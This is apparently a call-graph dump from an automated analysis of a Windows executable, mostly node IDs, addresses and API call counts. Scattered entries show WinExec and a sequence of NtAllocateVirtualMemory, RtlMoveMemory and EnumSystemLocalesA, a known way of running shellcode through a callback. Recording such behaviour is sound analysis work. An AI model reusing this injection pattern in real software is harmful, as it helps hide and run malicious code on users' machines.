26554->26556 26558 28c0260 26555->26558 26563 28c17e1 
26556->26563 26559 28b7be8 14 API calls 26557->26559 26564 28c028a 26558->26564 26560 28c34b9 26559->26560 26561 28a4824 8 API calls 26560->26561 26562 28c34da 26561->26562 26567 28c34e5 26562->26567 26565 28c1818 26563->26565 26566 28b7be8 14 API calls 26564->26566 26569 28b7be8 14 API calls 26565->26569 26571 28c02a3 26566->26571 26575 28c351c 26567->26575 26568 28a4824 8 API calls 26568->26571 26570 28c1831 26569->26570 26573 28c1841 26570->26573 26571->26568 26572 28c02cf 26571->26572 26582 28c02dc 26572->26582 26574 28a7e3c GetFileAttributesA 26573->26574 26576 28c184c 26574->26576 26577 28b7be8 14 API calls 26575->26577 26578 28c1854 26576->26578 26576->26659 26579 28c3535 26577->26579 26580 28a4824 8 API calls 26578->26580 26581 28a4824 8 API calls 26579->26581 26589 28c1875 26580->26589 26583 28c3556 26581->26583 26584 28b7be8 14 API calls 26582->26584 26588 28c358d 26583->26588 26585 28c031f 26584->26585 26586 28ae3b8 48 API calls 26585->26586 26587 28b17a4 59 API calls 26585->26587 26586->26585 26592 28c0348 26587->26592 26593 28b7be8 14 API calls 26588->26593 26591 28b7be8 14 API calls 26589->26591 26590 28a4824 8 API calls 26590->26592 26594 28c18d0 26591->26594 26592->26590 26597 28c0381 26592->26597 26595 28c35b1 26593->26595 26596 28a4824 8 API calls 26594->26596 26598 28bc78c 8 API calls 26595->26598 26604 28c18f1 26596->26604 26600 28c03a0 26597->26600 26599 28c35c7 26598->26599 26601 28a44f4 8 API calls 26599->26601 26605 28a4964 26600->26605 26602 28c35d7 26601->26602 26603 28a4824 8 API calls 26602->26603 26614 28c35f8 26603->26614 26609 28c1909 26604->26609 26606 28c03ab 26605->26606 26607 28a4698 26606->26607 26608 28c03b8 26607->26608 26610 28b7be8 14 API calls 26608->26610 26615 28c1940 26609->26615 26611 28c03c4 26610->26611 26612 28a4824 8 API calls 26611->26612 26613 28c03e5 26612->26613 26618 28c03fd 26613->26618 26617 28c363a 26614->26617 26616 28b7be8 14 API calls 26615->26616 26620 28c194c 26616->26620 26619 28c3647 26617->26619 26621 
28c041c 26618->26621 26622 28b7be8 14 API calls 26619->26622 26623 28c1975 26620->26623 26626 28c0427 26621->26626 26624 28c3653 26622->26624 26625 28a794c 8 API calls 26623->26625 26627 28a4824 8 API calls 26624->26627 26628 28c1981 26625->26628 26632 28c0434 26626->26632 26633 28c3674 26627->26633 26629 28a4824 8 API calls 26628->26629 26631 28c19d8 26629->26631 26630 28b7be8 14 API calls 26630->26632 26637 28c19e3 26631->26637 26632->26630 26634 28c0445 26632->26634 26635 28c36b6 26633->26635 26636 28a4824 8 API calls 26634->26636 26638 28c0471 26634->26638 26639 28c36c3 26635->26639 26636->26634 26643 28c1a1a 26637->26643 26644 28c047e 26638->26644 26640 28b7be8 14 API calls 26639->26640 26641 28c36cf 26640->26641 26642 28a7a88 32 API calls 26641->26642 26645 28c36d9 26642->26645 26646 28b7be8 14 API calls 26643->26646 26652 28a4698 26644->26652 26647 28bd270 8 API calls 26645->26647 26649 28c1a33 26646->26649 26648 28c36eb 26647->26648 26650 28a44f4 8 API calls 26648->26650 26651 28a4824 8 API calls 26649->26651 26653 28c36fb 26650->26653 26658 28c1a79 26651->26658 26654 28c04b5 26652->26654 26655 28a4824 8 API calls 26653->26655 26656 28b7be8 14 API calls 26654->26656 26657 28c371c 26655->26657 26656->26399 26660 28c3727 26657->26660 26658->26659 26659->25600 26659->26505 26661 28b7be8 14 API calls 26660->26661 26662 28c3777 26661->26662 26663 28a4824 8 API calls 26662->26663 26669 28c3798 26663->26669 26664->26379 26665 28a4824 8 API calls 26665->26666 26666->26665 26667 28c059b 26666->26667 26668 28c05ba 26667->26668 26670 28a4964 26668->26670 26671 28b7be8 14 API calls 26669->26671 26672 28c05c5 26670->26672 26673 28c37f3 26671->26673 26674 28a4698 26672->26674 26675 28a4824 8 API calls 26673->26675 26676 28c05d2 26674->26676 26683 28c3814 26675->26683 26677 28b7be8 14 API calls 26676->26677 26678 28c05de 26677->26678 26679 28a4824 8 API calls 26678->26679 26680 28c05ff 26679->26680 26681 28c0617 26680->26681 26682 28c0636 26681->26682 26684 28c0641 
26682->26684 26685 28b7be8 14 API calls 26683->26685 26688 28c064e 26684->26688 26686 28c386f 26685->26686 26687 28a4824 8 API calls 26686->26687 26695 28c3890 26687->26695 26689 28b7be8 14 API calls 26688->26689 26690 28bd578 8 API calls 26688->26690 26689->26688 26691 28c066a 26690->26691 26692 28a44f4 8 API calls 26691->26692 26693 28a4824 8 API calls 26691->26693 26692->26691 26694 28c069b 26693->26694 26697 28c06a6 26694->26697 26696 28b7be8 14 API calls 26695->26696 26698 28c38eb 26696->26698 26701 28a4964 26697->26701 26699 28bd198 8 API calls 26698->26699 26700 28c38fb 26699->26700 26702 28bd20c 8 API calls 26700->26702 26703 28c06dd 26701->26703 26704 28c390c 26702->26704 26710 28c06ea 26703->26710 26705 28a44f4 8 API calls 26704->26705 26706 28c391c 26705->26706 26707 28a4824 8 API calls 26706->26707 26711 28c393d 26707->26711 26708 28b7be8 14 API calls 26708->26710 26709 28a4824 8 API calls 26709->26710 26710->26708 26710->26709 26713 28c0759 26710->26713 26712 28b7be8 14 API calls 26711->26712 26714 28c3998 26712->26714 26715 28b7be8 14 API calls 26713->26715 26716 28a4824 8 API calls 26714->26716 26715->26383 26717 28c39b9 26716->26717 26718 28b7be8 14 API calls 26717->26718 26719 28c3a14 26718->26719 26720 28a4824 8 API calls 26719->26720 26721 28c3a35 26720->26721 26722 28b7be8 14 API calls 26721->26722 26723 28c3a90 26722->26723 26724 28a4824 8 API calls 26723->26724 26725 28c3ab1 26724->26725 26726 28b7be8 14 API calls 26725->26726 26727 28c3b0c 26726->26727 26728 28a4824 8 API calls 26727->26728 26729 28c3b2d 26728->26729 26730 28b7be8 14 API calls 26729->26730 26731 28c3b88 26730->26731 26732 28a4824 8 API calls 26731->26732 26733 28c3ba9 26732->26733 26734 28b7be8 14 API calls 26733->26734 26735 28c3c04 26734->26735 26736 28c53e0 26735->26736 26737 28a4824 8 API calls 26735->26737 26738 28a4824 8 API calls 26736->26738 26739 28c3c39 26737->26739 26742 28c5401 26738->26742 26739->26736 26740 28c3c64 26739->26740 26741 28a4824 8 API calls 
26740->26741 26746 28c3c85 26741->26746 26743 28b7be8 14 API calls 26742->26743 26744 28c545c 26743->26744 26745 28a4824 8 API calls 26744->26745 26750 28c547d 26745->26750 26747 28b7be8 14 API calls 26746->26747 26748 28c3ce0 26747->26748 26749 28a4824 8 API calls 26748->26749 26754 28c3d01 26749->26754 26751 28b7be8 14 API calls 26750->26751 26752 28c54d8 26751->26752 26753 28a4824 8 API calls 26752->26753 26758 28c54f9 26753->26758 26755 28b7be8 14 API calls 26754->26755 26756 28c3d5c 26755->26756 26757 28a4824 8 API calls 26756->26757 26762 28c3d7d 26757->26762 26759 28b7be8 14 API calls 26758->26759 26760 28c5554 26759->26760 26761 28a4824 8 API calls 26760->26761 26766 28c5575 26761->26766 26763 28b7be8 14 API calls 26762->26763 26764 28c3dd8 26763->26764 26765 28a4824 8 API calls 26764->26765 26769 28c3df9 26765->26769 26767 28b7be8 14 API calls 26766->26767 26768 28c55d0 26767->26768 26770 28a4824 8 API calls 26768->26770 26771 28a4824 8 API calls 26769->26771 26772 28c55f1 26770->26772 26773 28c3e31 26771->26773 26774 28b7be8 14 API calls 26772->26774 26775 28b7be8 14 API calls 26773->26775 26776 28c564c 26774->26776 26777 28c3e8c 26775->26777 26779 28c6190 26776->26779 26780 28c5661 26776->26780 26778 28a4824 8 API calls 26777->26778 26783 28c3ead 26778->26783 26782 28a4824 8 API calls 26779->26782 26781 28a4824 8 API calls 26780->26781 26786 28c5682 26781->26786 26784 28c61b1 26782->26784 26785 28b7be8 14 API calls 26783->26785 26788 28b7be8 14 API calls 26784->26788 26787 28c3f08 26785->26787 26790 28b7be8 14 API calls 26786->26790 26789 28a4824 8 API calls 26787->26789 26792 28c620c 26788->26792 26795 28c3f29 26789->26795 26791 28c56dd 26790->26791 26793 28a4824 8 API calls 26791->26793 26794 28a4824 8 API calls 26792->26794 26797 28c56fe 26793->26797 26798 28c622d 26794->26798 26796 28b7be8 14 API calls 26795->26796 26799 28c3f84 26796->26799 26802 28b7be8 14 API calls 26797->26802 26800 28b7be8 14 API calls 26798->26800 26801 28a4824 8 API calls 
26799->26801 26803 28c6288 26800->26803 26807 28c3fa5 26801->26807 26804 28c5759 26802->26804 26805 28a4824 8 API calls 26803->26805 26806 28a4824 8 API calls 26804->26806 26810 28c62a9 26805->26810 26809 28c577a 26806->26809 26808 28b7be8 14 API calls 26807->26808 26811 28c4000 26808->26811 26813 28b7be8 14 API calls 26809->26813 26814 28b7be8 14 API calls 26810->26814 26812 28a4824 8 API calls 26811->26812 26817 28c403a 26812->26817 26818 28c57d5 26813->26818 26815 28c6304 26814->26815 26816 28a4824 8 API calls 26815->26816 26822 28c6325 26816->26822 26821 28a4824 8 API calls 26817->26821 26819 28c57f8 WinExec 26818->26819 26820 28a4824 8 API calls 26819->26820 26825 28c581f 26820->26825 26824 28c4072 26821->26824 26823 28b7be8 14 API calls 26822->26823 26827 28c6380 26823->26827 26828 28b7be8 14 API calls 26824->26828 26829 28b7be8 14 API calls 26825->26829 26826 28c6b54 26830 28a4824 8 API calls 26826->26830 26827->26826 26831 28a4824 8 API calls 26827->26831 26832 28c40cd 26828->26832 26833 28c587a 26829->26833 26836 28c6b75 26830->26836 26837 28c63b6 26831->26837 26834 28a4824 8 API calls 26832->26834 26835 28a4824 8 API calls 26833->26835 26838 28c40ee 26834->26838 26839 28c589b 26835->26839 26840 28b7be8 14 API calls 26836->26840 26841 28b7be8 14 API calls 26837->26841 26842 28b7be8 14 API calls 26838->26842 26843 28b7be8 14 API calls 26839->26843 26844 28c6bd0 26840->26844 26845 28c6411 26841->26845 26846 28c4149 26842->26846 26847 28c58f6 26843->26847 26848 28a4824 8 API calls 26844->26848 26849 28a4824 8 API calls 26845->26849 26850 28a4824 8 API calls 26846->26850 26851 28a4824 8 API calls 26847->26851 26852 28c6bf1 26848->26852 26853 28c6432 26849->26853 26854 28c416a 26850->26854 26855 28c5917 26851->26855 26856 28b7be8 14 API calls 26852->26856 26857 28b7be8 14 API calls 26853->26857 26858 28b7be8 14 API calls 26854->26858 26859 28b7be8 14 API calls 26855->26859 26860 28c6c4c 26856->26860 26861 28c648d 26857->26861 26862 28c41c5 26858->26862 26866 
28c5972 26859->26866 26863 28a4824 8 API calls 26860->26863 26864 28a4824 8 API calls 26861->26864 26865 28a4824 8 API calls 26862->26865 26870 28c6c6d 26863->26870 26871 28c64ae 26864->26871 26872 28c41e6 26865->26872 26867 28b9e70 26 API calls 26866->26867 26868 28c5999 26867->26868 26869 28a4824 8 API calls 26868->26869 26881 28c59ba 26869->26881 26873 28b7be8 14 API calls 26870->26873 26874 28b7be8 14 API calls 26871->26874 26875 28b7be8 14 API calls 26872->26875 26884 28c6cc8 26873->26884 26876 28c6509 26874->26876 26877 28c4241 26875->26877 26878 28a4824 8 API calls 26876->26878 26879 28a4824 8 API calls 26877->26879 26888 28c652a 26878->26888 26889 28c4262 26879->26889 26880 28c74a8 26882 28a4824 8 API calls 26880->26882 26883 28b7be8 14 API calls 26881->26883 26893 28c74c9 26882->26893 26886 28c5a15 26883->26886 26884->26880 26885 28a4824 8 API calls 26884->26885 26898 28c6d13 26885->26898 26887 28a4824 8 API calls 26886->26887 26900 28c5a36 26887->26900 26890 28b7be8 14 API calls 26888->26890 26891 28b7be8 14 API calls 26889->26891 26892 28c6585 26890->26892 26894 28c42bd 26891->26894 26895 28a4824 8 API calls 26892->26895 26897 28b7be8 14 API calls 26893->26897 26896 28a4824 8 API calls 26894->26896 26908 28c65a6 26895->26908 26909 28c42de 26896->26909 26899 28c7524 26897->26899 26902 28b7be8 14 API calls 26898->26902 26901 28a4824 8 API calls 26899->26901 26903 28b7be8 14 API calls 26900->26903 26913 28c7545 26901->26913 26904 28c6d6e 26902->26904 26905 28c5a91 26903->26905 26906 28a4824 8 API calls 26904->26906 26907 28a4824 8 API calls 26905->26907 26919 28c6d8f 26906->26919 26921 28c5ab2 26907->26921 26910 28b7be8 14 API calls 26908->26910 26911 28b7be8 14 API calls 26909->26911 26912 28c6601 26910->26912 26914 28c4339 26911->26914 26915 28a4824 8 API calls 26912->26915 26917 28b7be8 14 API calls 26913->26917 26916 28a4824 8 API calls 26914->26916 26931 28c6622 26915->26931 26918 28c4361 26916->26918 26920 28c75a0 26917->26920 26923 28c436c WinExec 
26918->26923 26924 28b7be8 14 API calls 26919->26924 26922 28a4824 8 API calls 26920->26922 26926 28b7be8 14 API calls 26921->26926 26933 28c75c1 26922->26933 26925 28a4824 8 API calls 26923->26925 26927 28c6dea 26924->26927 26934 28c4393 26925->26934 26928 28c5b0d 26926->26928 26929 28a4824 8 API calls 26927->26929 26930 28a4824 8 API calls 26928->26930 26936 28c6e0b 26929->26936 26943 28c5b4d 26930->26943 26932 28b7be8 14 API calls 26931->26932 26937 28c667d 26932->26937 26935 28b7be8 14 API calls 26933->26935 26938 28b7be8 14 API calls 26934->26938 26945 28c761c 26935->26945 26940 28b7be8 14 API calls 26936->26940 26941 28a4824 8 API calls 26937->26941 26939 28c43ee 26938->26939 26942 28a4824 8 API calls 26939->26942 26944 28c6e66 26940->26944 26957 28c66bb 26941->26957 26958 28c440f 26942->26958 26947 28b7be8 14 API calls 26943->26947 26946 28bd198 8 API calls 26944->26946 26949 28b7be8 14 API calls 26945->26949 26948 28c6e81 26946->26948 26950 28c5ba8 26947->26950 26951 28a4824 8 API calls 26948->26951 26953 28c764f 26949->26953 26952 28a4824 8 API calls 26950->26952 26954 28c6eaa 26951->26954 26966 28c5bc9 26952->26966 26955 28b7be8 14 API calls 26953->26955 26956 28a4824 8 API calls 26954->26956 26962 28c7682 26955->26962 26972 28c6ee2 26956->26972 26959 28b7be8 14 API calls 26957->26959 26960 28b7be8 14 API calls 26958->26960 26961 28c6716 26959->26961 26963 28c446a 26960->26963 26964 28a4824 8 API calls 26961->26964 26967 28b7be8 14 API calls 26962->26967 26965 28a4824 8 API calls 26963->26965 26979 28c6737 26964->26979 26980 28c448b 26965->26980 26968 28b7be8 14 API calls 26966->26968 26971 28c76b5 26967->26971 26969 28c5c24 26968->26969 26970 28a4824 8 API calls 26969->26970 26987 28c5c45 26970->26987 26973 28b7be8 14 API calls 26971->26973 26975 28b7be8 14 API calls 26972->26975 26974 28c76e8 26973->26974 26976 28a4824 8 API calls 26974->26976 26977 28c6f3d 26975->26977 26991 28c7709 26976->26991 26978 28a4824 8 API calls 26977->26978 26993 28c6f5e 
26978->26993 26981 28b7be8 14 API calls 26979->26981 26983 28b7be8 14 API calls 26980->26983 26982 28c6792 26981->26982 26985 28a4824 8 API calls 26982->26985 26984 28c44e6 26983->26984 26986 28a4824 8 API calls 26984->26986 27001 28c67b3 26985->27001 27002 28c4507 26986->27002 26988 28b7be8 14 API calls 26987->26988 26989 28c5ca0 26988->26989 26992 28b5aa8 32 API calls 26989->26992 26995 28b7be8 14 API calls 26991->26995 26994 28c5ccc 26992->26994 26996 28b7be8 14 API calls 26993->26996 27000 28a4b90 8 API calls 26994->27000 26997 28c7764 26995->26997 26998 28c6fb9 26996->26998 26999 28a4824 8 API calls 26997->26999 27004 28c6fcb 26998->27004 27005 28c72a2 26998->27005 27020 28c7785 26999->27020 27003 28c5ce1 27000->27003 27006 28b7be8 14 API calls 27001->27006 27011 28b7be8 14 API calls 27002->27011 27007 28a4824 8 API calls 27003->27007 27008 28a4824 8 API calls 27004->27008 27010 28a4824 8 API calls 27005->27010 27009 28c680e GetCurrentProcess 27006->27009 27022 28c5d02 27007->27022 27024 28c6fec 27008->27024 27012 28b7968 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 27009->27012 27025 28c72c3 27010->27025 27013 28c4562 27011->27013 27014 28c6828 27012->27014 27016 28c47d5 27013->27016 27017 28c4577 27013->27017 27015 28a4824 8 API calls 27014->27015 27033 28c684e 27015->27033 27019 28a4824 8 API calls 27016->27019 27018 28a4824 8 API calls 27017->27018 27038 28c4598 27018->27038 27036 28c47f6 27019->27036 27021 28b7be8 14 API calls 27020->27021 27023 28c77e0 27021->27023 27027 28b7be8 14 API calls 27022->27027 27026 28a4824 8 API calls 27023->27026 27029 28b7be8 14 API calls 27024->27029 27030 28b7be8 14 API calls 27025->27030 27050 28c7801 27026->27050 27028 28c5d5d 27027->27028 27039 28a49bc 8 API calls 27028->27039 27032 28c7047 27029->27032 27031 28c731e 27030->27031 27034 28a4824 8 API calls 27031->27034 27035 28a4824 8 API calls 27032->27035 27037 28b7be8 14 API calls 27033->27037 27053 28c733f 27034->27053 27052 28c7068 27035->27052 27043 
28b7be8 14 API calls 27036->27043 27041 28c68a9 27037->27041 27045 28b7be8 14 API calls 27038->27045 27040 28c5d7a RtlMoveMemory 27039->27040 27042 28a4824 8 API calls 27040->27042 27044 28a4824 8 API calls 27041->27044 27057 28c5da1 27042->27057 27046 28c4851 27043->27046 27059 28c68ca 27044->27059 27047 28c45f3 27045->27047 27049 28a4824 8 API calls 27046->27049 27048 28a4824 8 API calls 27047->27048 27064 28c4614 27048->27064 27066 28c4872 27049->27066 27051 28b7be8 14 API calls 27050->27051 27056 28c785c 27051->27056 27054 28b7be8 14 API calls 27052->27054 27055 28b7be8 14 API calls 27053->27055 27058 28c70c3 27054->27058 27060 28c739a 27055->27060 27063 28b7be8 14 API calls 27056->27063 27065 28b7be8 14 API calls 27057->27065 27061 28a4824 8 API calls 27058->27061 27067 28b7be8 14 API calls 27059->27067 27062 28a4824 8 API calls 27060->27062 27080 28c70e4 27061->27080 27081 28c73bb 27062->27081 27075 28c788f 27063->27075 27072 28b7be8 14 API calls 27064->27072 27069 28c5dfc 27065->27069 27070 28b7be8 14 API calls 27066->27070 27068 28c6925 27067->27068 27071 28a4824 8 API calls 27068->27071 27073 28a4824 8 API calls 27069->27073 27074 28c48cd 27070->27074 27088 28c6946 27071->27088 27076 28c466f 27072->27076 27086 28c5e1d 27073->27086 27077 28a4824 8 API calls 27074->27077 27079 28b7be8 14 API calls 27075->27079 27078 28a4824 8 API calls 27076->27078 27094 28c48ee 27077->27094 27092 28c4690 27078->27092 27082 28c78c2 27079->27082 27083 28b7be8 14 API calls 27080->27083 27084 28b7be8 14 API calls 27081->27084 27085 28b7be8 14 API calls 27082->27085 27087 28c713f 27083->27087 27089 28c7416 27084->27089 27100 28c78f5 27085->27100 27093 28b7be8 14 API calls 27086->27093 27090 28bc74c 8 API calls 27087->27090 27096 28b7be8 14 API calls 27088->27096 27091 28a4824 8 API calls 27089->27091 27095 28c7154 27090->27095 27115 28c7437 27091->27115 27101 28b7be8 14 API calls 27092->27101 27097 28c5e78 27093->27097 27103 28b7be8 14 API calls 27094->27103 27098 28a44f4 8 API 
calls 27095->27098 27099 28c69a1 27096->27099 27102 28a4824 8 API calls 27097->27102 27104 28c7164 27098->27104 27106 28a49bc 8 API calls 27099->27106 27105 28b7be8 14 API calls 27100->27105 27107 28c46eb 27101->27107 27120 28c5e99 27102->27120 27108 28c4949 27103->27108 27109 28a4824 8 API calls 27104->27109 27113 28c7928 27105->27113 27111 28c69c5 27106->27111 27112 28a4824 8 API calls 27107->27112 27110 28a4824 8 API calls 27108->27110 27122 28c7185 27109->27122 27126 28c496a 27110->27126 27114 28a4824 8 API calls 27111->27114 27124 28c470c 27112->27124 27116 28b7be8 14 API calls 27113->27116 27138 28c69f4 27114->27138 27118 28b7be8 14 API calls 27115->27118 27117 28c795b 27116->27117 27119 28a4824 8 API calls 27117->27119 27121 28c7492 27118->27121 27143 28c797c 27119->27143 27125 28b7be8 14 API calls 27120->27125 27123 28a49bc 8 API calls 27121->27123 27129 28b7be8 14 API calls 27122->27129 27127 28c749c 27123->27127 27131 28b7be8 14 API calls 27124->27131 27128 28c5ef4 27125->27128 27133 28b7be8 14 API calls 27126->27133 27130 28b7f48 30 API calls 27127->27130 27132 28a4824 8 API calls 27128->27132 27134 28c71e0 27129->27134 27130->26880 27135 28c4767 27131->27135 27149 28c5f15 27132->27149 27136 28c49c5 27133->27136 27137 28a4824 8 API calls 27134->27137 27139 28a4824 8 API calls 27135->27139 27140 28a4824 8 API calls 27136->27140 27150 28c7201 27137->27150 27141 28b7be8 14 API calls 27138->27141 27147 28c4788 27139->27147 27153 28c49e6 27140->27153 27142 28c6a4f 27141->27142 27144 28a4824 8 API calls 27142->27144 27145 28b7be8 14 API calls 27143->27145 27160 28c6a70 27144->27160 27146 28c79d7 27145->27146 27148 28a4824 8 API calls 27146->27148 27151 28bc3f8 13 API calls 27147->27151 27164 28c79f8 27148->27164 27152 28b7be8 14 API calls 27149->27152 27155 28b7be8 14 API calls 27150->27155 27151->27016 27154 28c5f70 27152->27154 27157 28b7be8 14 API calls 27153->27157 27156 28ba1c0 45 API calls 27154->27156 27166 28c725c 27155->27166 27158 28c5f81 
27156->27158 27159 28c4a41 27157->27159 27158->25600 27161 28a4824 8 API calls 27159->27161 27162 28b7be8 14 API calls 27160->27162 27170 28c4a62 27161->27170 27163 28c6acb 27162->27163 27165 28a4824 8 API calls 27163->27165 27168 28b7be8 14 API calls 27164->27168 27176 28c6aec 27165->27176 27167 28bc3f8 13 API calls 27166->27167 27167->27005 27169 28c7a53 27168->27169 27171 28b7be8 14 API calls 27169->27171 27172 28b7be8 14 API calls 27170->27172 27173 28c7a86 27171->27173 27174 28c4abd 27172->27174 27175 28a4824 8 API calls 27173->27175 27177 28a4824 8 API calls 27174->27177 27180 28c7aa7 27175->27180 27178 28b7be8 14 API calls 27176->27178 27181 28c4ade 27177->27181 27179 28c6b47 EnumSystemLocalesA 27178->27179 27179->26826 27182 28b7be8 14 API calls 27180->27182 27183 28b7be8 14 API calls 27181->27183 27184 28c7b02 27182->27184 27185 28c4b39 27183->27185 27186 28a4824 8 API calls 27184->27186 27187 28a4824 8 API calls 27185->27187 27188 28c7b23 27186->27188 27190 28c4b79 27187->27190 27189 28b7be8 14 API calls 27188->27189 27191 28c7b7e 27189->27191 27193 28b7be8 14 API calls 27190->27193 27192 28a4824 8 API calls 27191->27192 27196 28c7b9f 27192->27196 27194 28c4bd4 27193->27194 27195 28a4824 8 API calls 27194->27195 27197 28c4c03 27195->27197 27199 28b7be8 14 API calls 27196->27199 27198 28a794c 8 API calls 27197->27198 27200 28c4c2b 27198->27200 27201 28c7bfa 27199->27201 27202 28a4824 8 API calls 27200->27202 27203 28b7be8 14 API calls 27201->27203 27206 28c4c72 27202->27206 27204 28c7c2d 27203->27204 27205 28b7be8 14 API calls 27204->27205 27207 28c7c60 27205->27207 27208 28b7be8 14 API calls 27206->27208 27210 28b7be8 14 API calls 27207->27210 27209 28c4ccd 27208->27209 27211 28a4824 8 API calls 27209->27211 27212 28c7c93 27210->27212 27216 28c4cee 27211->27216 27213 28b7be8 14 API calls 27212->27213 27214 28c7cc6 27213->27214 27215 28a4824 8 API calls 27214->27215 27220 28c7ce7 27215->27220 27217 28b7be8 14 API calls 27216->27217 27218 28c4d49 
27217->27218 27219 28a794c 8 API calls 27218->27219 27223 28c4d5f 27219->27223 27221 28b7be8 14 API calls 27220->27221 27222 28c7d42 27221->27222 27224 28a4824 8 API calls 27222->27224 27225 28a4824 8 API calls 27223->27225 27226 28c7d63 27224->27226 27227 28c4da6 27225->27227 27228 28b7be8 14 API calls 27226->27228 27229 28b7be8 14 API calls 27227->27229 27232 28c7dbe 27228->27232 27230 28c4e01 27229->27230 27231 28a4824 8 API calls 27230->27231 27236 28c4e22 27231->27236 27233 28b7be8 14 API calls 27232->27233 27234 28c7df1 27233->27234 27235 28b7be8 14 API calls 27234->27235 27239 28c7e24 27235->27239 27237 28b7be8 14 API calls 27236->27237 27238 28c4e7d 27237->27238 27240 28a4824 8 API calls 27238->27240 27241 28b7be8 14 API calls 27239->27241 27244 28c4eb7 27240->27244 27242 28c7e57 27241->27242 27243 28b7be8 14 API calls 27242->27243 27245 28c7e8a 27243->27245 27244->25600 27246 28b7be8 14 API calls 27245->27246 27247 28c7ebd 27246->27247 27248 28a4824 8 API calls 27247->27248 27249 28c7ede 27248->27249 27250 28b7be8 14 API calls 27249->27250 27251 28c7f39 27250->27251 27252 28a4824 8 API calls 27251->27252 27253 28c7f5a 27252->27253 27254 28b7be8 14 API calls 27253->27254 27255 28c7fb5 27254->27255 27256 28a4824 8 API calls 27255->27256 27257 28c7fd6 27256->27257 27258 28b7be8 14 API calls 27257->27258 27259 28c8031 27258->27259 27260 28a4824 8 API calls 27259->27260 27261 28c8052 27260->27261 27262 28b7be8 14 API calls 27261->27262 27263 28c80ad 27262->27263 27264 28a4824 8 API calls 27263->27264 27265 28c80ce 27264->27265 27266 28b7be8 14 API calls 27265->27266 27267 28c8129 27266->27267 27268 28b7be8 14 API calls 27267->27268 27269 28c8138 27268->27269 27270 28b7be8 14 API calls 27269->27270 27271 28c8147 27270->27271 27272 28b7be8 14 API calls 27271->27272 27273 28c8156 27272->27273 27274 28b7be8 14 API calls 27273->27274 27275 28c8165 27274->27275 27276 28b7be8 14 API calls 27275->27276 27277 28c8174 27276->27277 27278 28b7be8 14 API calls 27277->27278 
27279 28c8183 27278->27279 27280 28b7be8 14 API calls 27279->27280 27281 28c8192 27280->27281 27282 28b7be8 14 API calls 27281->27282 27283 28c81a1 27282->27283 27284 28b7be8 14 API calls 27283->27284 27285 28c81b0 27284->27285 27286 28b7be8 14 API calls 27285->27286 27287 28c81bf 27286->27287 27288 28b7be8 14 API calls 27287->27288 27289 28c81ce 27288->27289 27290 28b7be8 14 API calls 27289->27290 27291 28c81dd 27290->27291 27292 28b7be8 14 API calls 27291->27292 27293 28c81ec 27292->27293 27294 28b7be8 14 API calls 27293->27294 27295 28c81fb 27294->27295 27296 28b7be8 14 API calls 27295->27296 27297 28c820a 27296->27297 27298 28a4824 8 API calls 27297->27298 27299 28c822b 27298->27299 27300 28b7be8 14 API calls 27299->27300 27301 28c8286 27300->27301 27302 28a4824 8 API calls 27301->27302 27303 28c82a7 27302->27303 27304 28b7be8 14 API calls 27303->27304 27305 28c8302 27304->27305 27306 28a4824 8 API calls 27305->27306 27307 28c8323 27306->27307 27308 28b7be8 14 API calls 27307->27308 27309 28c837e 27308->27309 27310 28b7be8 14 API calls 27309->27310 27311 28c83b1 27310->27311 27312 28b7be8 14 API calls 27311->27312 27313 28c83e4 27312->27313 27314 28b7be8 14 API calls 27313->27314 27315 28c8417 27314->27315 27316 28b7be8 14 API calls 27315->27316 27317 28c844a 27316->27317 27318 28b7be8 14 API calls 27317->27318 27319 28c847d 27318->27319 27320 28b7be8 14 API calls 27319->27320 27321 28c84b0 27320->27321 27322 28b7be8 14 API calls 27321->27322 27323 28c84e3 27322->27323 27324 28a4824 8 API calls 27323->27324 27325 28c8504 27324->27325 27326 28b7be8 14 API calls 27325->27326 27327 28c855f 27326->27327 27328 28a4824 8 API calls 27327->27328 27329 28c8580 27328->27329 27330 28b7be8 14 API calls 27329->27330 27331 28c85db 27330->27331 27332 28a4824 8 API calls 27331->27332 27333 28c85fc 27332->27333 27334 28b7be8 14 API calls 27333->27334 27335 28c8657 27334->27335 27336 28b7be8 14 API calls 27335->27336 27337 28c868a 27336->27337 27338 28b7be8 14 API calls 
27337->27338 27339 28c86bd 27338->27339 27340 28b7be8 14 API calls 27339->27340 27341 28c86f0 27340->27341 27342 28b7be8 14 API calls 27341->27342 27343 28c8723 27342->27343 27344 28b7be8 14 API calls 27343->27344 27345 28c8756 27344->27345 27346 28b7be8 14 API calls 27345->27346 27347 28c8789 27346->27347 27348 28b7be8 14 API calls 27347->27348 27349 28c87bc 27348->27349 27350 28b7be8 14 API calls 27349->27350 27351 28c87ef 27350->27351 27352 28b7be8 14 API calls 27351->27352 27353 28c8822 27352->27353 27354 28b7be8 14 API calls 27353->27354 27355 28c8855 27354->27355 27356 28b7be8 14 API calls 27355->27356 27357 28c8888 27356->27357 27358 28b7be8 14 API calls 27357->27358 27359 28c88bb 27358->27359 27360 28b7be8 14 API calls 27359->27360 27361 28c88ee 27360->27361 27362 28b7be8 14 API calls 27361->27362 27363 28c8921 27362->27363 27364 28b7be8 14 API calls 27363->27364 27365 28c8954 27364->27365 27366 28b7be8 14 API calls 27365->27366 27367 28c8987 27366->27367 27368 28b7be8 14 API calls 27367->27368 27369 28c89ba 27368->27369 27370 28b7be8 14 API calls 27369->27370 27371 28c89ed 27370->27371 27372 28b7be8 14 API calls 27371->27372 27373 28c8a20 27372->27373 27374 28a4824 8 API calls 27373->27374 27375 28c8a41 27374->27375 27376 28b7be8 14 API calls 27375->27376 27377 28c8a9c 27376->27377 27378 28a4824 8 API calls 27377->27378 27379 28c8abd 27378->27379 27380 28b7be8 14 API calls 27379->27380 27381 28c8b18 27380->27381 27382 28a4824 8 API calls 27381->27382 27383 28c8b39 27382->27383 27384 28b7be8 14 API calls 27383->27384 27385 28c8b94 ExitProcess 27384->27385 27387 28a4835 27386->27387 27388 28a485b 27387->27388 27389 28a4872 27387->27389 27401 28a4b90 27388->27401 27407 28a4564 27389->27407 27392 28a48a3 27393 28a4868 27393->27392 27394 28a44f4 8 API calls 27393->27394 27394->27392 27397 28a44f8 27395->27397 27399 28a4508 27395->27399 27396 28a4536 27396->25610 27398 28a4564 8 API calls 27397->27398 27397->27399 27398->27399 27399->27396 27400 28a2c2c 8 API 
